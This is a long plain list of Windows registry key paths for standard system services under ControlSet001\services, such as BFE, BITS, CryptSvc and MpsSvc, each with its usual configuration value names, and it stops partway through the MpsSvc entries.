HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BDESVC\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BFE\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\bthserv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CertPropSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_32\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v2.0.50727_64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_32\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\COMSysApp\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\defragsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\dot3svc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EapHost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EFS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehRecvr\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ehSched\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\EventSystem\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Fax\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\fdPHost\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache3.0.0.0\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\BITS\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hidserv\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\hkmsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupListener\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\HomeGroupProvider\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\idsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KeyIso\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\KtmRm\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lltdsvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\lmhosts\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\MpsSvc\DependOnService 